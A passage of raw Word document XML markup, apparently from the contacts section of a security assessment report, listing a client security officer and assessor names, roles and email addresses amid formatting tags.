                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7750DDEF" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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1"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00071C21" w14:paraId="7B827DCF" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="270"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="745EFFA6" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00071C21">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Chief </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Security Officer</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00587442" w14:paraId="157E3834" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="270"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="58216DCD" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="263ED77E" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>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49B6" w:rsidRPr="00071C21" w14:paraId="7DB07709" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="53DDC3E1" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="75D38E7A" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2870" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="500DC20D" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>mstodz@client.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ADA3D92" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75BCA10E" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRDefault="007E49B6" w:rsidP="007E49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607B8414" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6" w:rsidP="007E49B6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assessor Contact</w:t>
      </w:r>
      <w:r w:rsidRPr="00587442">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86E5FA" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRDefault="007E49B6" w:rsidP="007E49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable5Dark-Accent1"/>
        <w:tblW w:w="8815" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2539"/>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="3745"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E49B6" w14:paraId="05EBC12F" w14:textId="77777777">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539" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B31AB8B" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Name </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="7B8ED9EB" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Role </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="324B1830" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E49B6" w:rsidRPr="007E5AFC" w14:paraId="39739EA5" w14:textId="77777777">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1421"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2539" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="2206" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2206"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00754200" w14:paraId="1061B5AF" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="996"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="405ED016" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00754200" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Mohamed Raheel</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0F83BE50" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00754200" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="cente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49B6" w:rsidRPr="00754200" w14:paraId="521A905B" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4C28BE55" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00754200" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6020C5DA" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1708" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1708"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00714D02" w14:paraId="669A59BC" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1446"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="64533162" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00714D02" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Service Delivery</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4A717908" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00714D02" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>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49B6" w:rsidRPr="00714D02" w14:paraId="06F9FCBC" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7E3D0BC8" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00714D02" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3F615C30" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="3529" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3529"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00524D85" w14:paraId="33675014" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1203"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="151A7781" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:br/>
                    <w:t>moh.raheel2@company.com</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1D77DC4B" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00524D85" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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49B6" w:rsidRPr="00524D85" w14:paraId="492FC6C5" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="1A4AF899" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00524D85" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="48E94E74" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E49B6" w:rsidRPr="007562F5" w14:paraId="4F981AD7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1331"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2539" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="2323" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2323"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="0054504D" w14:paraId="62196178" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1526"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2399E600" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Ahmed Ali</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="02BD1FC6" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="0054504D" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="cente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49B6" w:rsidRPr="0054504D" w14:paraId="2BAA9991" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2C78A6FA" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="0054504D" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4AD22ADD" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1397" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1679"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00071C21" w14:paraId="0BED0B8D" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="315"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7BC33C4B" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
